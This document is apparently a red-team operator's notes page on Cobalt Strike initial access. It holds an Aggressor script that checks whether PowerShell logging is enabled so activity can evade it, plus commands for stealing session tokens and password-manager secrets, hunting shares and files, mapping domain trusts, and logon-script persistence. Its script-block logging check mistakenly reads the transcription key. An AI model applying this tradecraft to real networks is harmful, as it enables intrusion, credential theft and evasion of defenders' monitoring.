Initial Acces / Aggressors

Try get cob to load against 127.0.0.2

PowerShell:

Try stick to powerpick using PPID spoofing

agressor to check for powershell modules: 

on beacon_inital {
    # check is loggins is enables
    blog($1, "checking for PowerShell transcription");
    bpowerpick($1, 'if((Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription" -ErrorAction SilentlyContinue).EnableTranscription -ne $null) {Write-Output "PowerShell Transcription is Enabled!" }');
    
    blog($1, "Checking for PowerShell Script block Logging");
    bpowerpick($1, 'if((Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription" -ErrorAction SilentlyContinue).EnableTranscription -ne $null) {Write-Output "PowerShell Script Block Logging is Enabled!" }');
    
    blog($1, "Checking for PowerShell Module Logging");
    bpowerpick($1, 'if((Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -ErrorAction SilentlyContinue).EnableTranscription -ne $null) {Write-Output "PowerShell Module Logging is Enabled!" }');
}

Host Recon:

LogoGitHub - dafthack/HostRecon: This function runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase. It gathers information about the local system, users, and domain information. It does not use any 'net', 'ipconfig', 'whoami', 'netstat', or other system commands to help avoid detection.GitHub
LogoGitHub - GhostPack/Seatbelt: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.GitHub

Think about running:

  • KeeTheif/ enum password managers

  • SessionGopher - Steal session tokens/ Passwords

  • SessionSearch

  • Invoke-ShareFinder | Invoke-ShareFinder -ExcludeStandard -NoPing -CheckShareAccess

  • Find interesting files | Find-InterestingFile -Path C:\Users\Admin -Terms local

  • Search for local admin access | Find-LocalAdminAccess or try dir \\host\C$

Domain Trusts:

  • PowerView - Invoke-MapDomainTrust Invoke-MapDomainTrust | Export-CSV - NoTypeInformation C:\Windows\Temp\trust.csv

  • DomainTrustExplorer parses the CSV and outputs graphml file https://github.com/sixdub/DomainTrustExplorer python3 trust_explorer.py -f trust.csv -g

  • View map using yED

Immediate Persistence:

UserInitMprLogonScript

PreviousMalleable ProfilesNextBeacon Object Files (BOF)

Last updated